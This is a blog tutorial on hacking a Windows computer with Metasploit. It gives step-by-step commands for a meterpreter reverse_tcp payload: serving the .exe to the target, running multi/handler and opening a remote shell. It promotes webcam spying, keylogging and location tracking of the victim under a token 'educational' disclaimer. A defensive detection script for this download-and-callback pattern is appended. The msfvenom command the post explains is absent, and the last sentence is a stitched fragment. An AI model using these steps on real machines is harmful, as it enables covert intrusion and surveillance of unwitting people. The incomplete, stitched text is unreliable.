Hacking Windows using Metasploit Framework!!
*ONLY FOR EDUCATIONAL PURPOSES*
Intro:
Yes, you heard it right.
This blog is all gonna be about hacking into a Windows-based system and gaining complete access to it.
Cool Stuff you can do with this:
- Take screenshots of the target's system
- Webcam Snaps/Live Streaming
- Get access to the entire directory
- Keylogging
- Location coordinates of the target
This was all just a piece of the play. Metasploit Framework (MSF) is an area where you have to get creative to find out what all you can do with the resources provided. The more you work, the more you learn.
Without further ado, let's get started!!
___________________________________________________________________________________
Things you'll need:
- Kali Linux (preferably)
- Target Device
- Internet
Well, that's it!
Step 1:
Fire up your Kali and launch the terminal.
Start the PostgreSQL service from there. Metasploit uses PostgreSQL as its database, so it needs to be launched first. PostgreSQL is an open source object-relational database system.
-->service postgresql start
Step 2:
Initialize the Metasploit Framework using
-->msfconsole
This might take some time to set up the services.
Meanwhile, open another tab (or window in this case) and find out your IP address by typing in
-->ifconfig
Step 3:
Once the msfconsole is set up, it's time to create the PAYLOAD.
While creating the payload, you need to specify the architecture and platform (Windows in this case) of the target system you are creating the payload for.
Let's understand the above code piece by piece
*msfvenom is the Metasploit tool used to create payloads.
*-p (p for payload) specifies the payload to use, like 'windows/meterpreter/reverse_tcp'.
For more info on meterpreter and reverse_tcp, go check out our previous blogs.
*--platform mentions the platform of the target system (Windows in this case).
*-a specifies the architecture of the target computer (x86 is for 32 bit).
*LHOST is the IP address of the local host.
*LPORT is the listening port (set to 4444 by default; if you pick one manually, use a port number above 4444 and below 9999).
*-f specifies the file type of the payload.
*-o is to specify the name and location of the output payload in your computer.
Step 4:
Now since the payload is ready, download and run the ***.exe file on the target's computer.
Here I have hosted my file directory using python3 and downloaded it from the web browser of the target.
-->python3 -m http.server {port}
Note: Hosting port should be different from listening port.
After downloading the ***.exe file on the target's computer, we are good to go with the exploitation of the target system.
-->use exploit/multi/handler
*multi/handler is a part of the MSF that handles exploits launched outside of the framework.
-->set PAYLOAD windows/meterpreter/reverse_tcp
-->set LHOST {lhost}
-->set LPORT {lport}
and now comes the final part...
-->exploit
Step 5:
After the above command, you will have to run the ***.exe program on the target's computer, following which you will receive a confirmation about the exploitation.
If you are successful in exploiting the target's computer, you will have a similar screen as below:
Voila!!!
You've successfully hacked the target's computer!
For Meterpreter commands, use
-->help
You're on your own now.
-: Teja Hara
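Seen from the defender's side, Steps 4 and 5 leave a recognisable trace: an .exe fetched over HTTP from a server, then that same file connecting back to the same address on a different port. The following is an added example, not part of the original post; the event format, field names, host names and sample data are all constructed assumptions.

```python
from urllib.parse import urlsplit

# Constructed sample telemetry (not from the original post). The field names
# are assumptions, loosely modelled on web-proxy and Sysmon network events.
SAMPLE_EVENTS = [
    {"type": "download", "host": "WS-01",
     "url": "http://192.0.2.10:8000/update.exe",
     "saved_as": r"C:\Users\alice\Downloads\update.exe"},
    {"type": "netconn", "host": "WS-01",
     "image": r"C:\Users\alice\Downloads\update.exe",
     "dst_ip": "192.0.2.10", "dst_port": 4444},
    {"type": "download", "host": "WS-02",
     "url": "https://downloads.example.com/setup.exe",
     "saved_as": r"C:\Users\bob\Downloads\setup.exe"},
    {"type": "netconn", "host": "WS-02",
     "image": r"C:\Users\bob\Downloads\setup.exe",
     "dst_ip": "198.51.100.7", "dst_port": 443},
]

DEFAULT_LPORT = 4444  # default listening port named in Step 3


def find_callbacks(events):
    """Flag a downloaded .exe that connects back to the server it came from
    on a different port (hosting port != listening port, as in Step 4)."""
    origins = {}  # (host, exe path) -> (server address, hosting port)
    alerts = []
    for ev in events:
        if ev["type"] == "download" and ev["saved_as"].lower().endswith(".exe"):
            url = urlsplit(ev["url"])
            port = url.port or (443 if url.scheme == "https" else 80)
            origins[(ev["host"], ev["saved_as"].lower())] = (url.hostname, port)
        elif ev["type"] == "netconn":
            origin = origins.get((ev["host"], ev["image"].lower()))
            # Only IP-literal download URLs match here; mapping hostnames to
            # addresses would need DNS logs, which this example leaves out.
            if origin and ev["dst_ip"] == origin[0] and ev["dst_port"] != origin[1]:
                alerts.append({
                    "host": ev["host"], "image": ev["image"],
                    "server": origin[0], "hosting_port": origin[1],
                    "callback_port": ev["dst_port"],
                    "default_lport": ev["dst_port"] == DEFAULT_LPORT,
                })
    return alerts


if __name__ == "__main__":
    for alert in find_callbacks(SAMPLE_EVENTS):
        print(alert)
```

Only the WS-01 pair is flagged; the WS-02 download and its HTTPS connection do not share an address, so they pass.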
We will be getting a reverse TCP connection from the victim machine by using a small backdoor hack windows 7 using metasploit.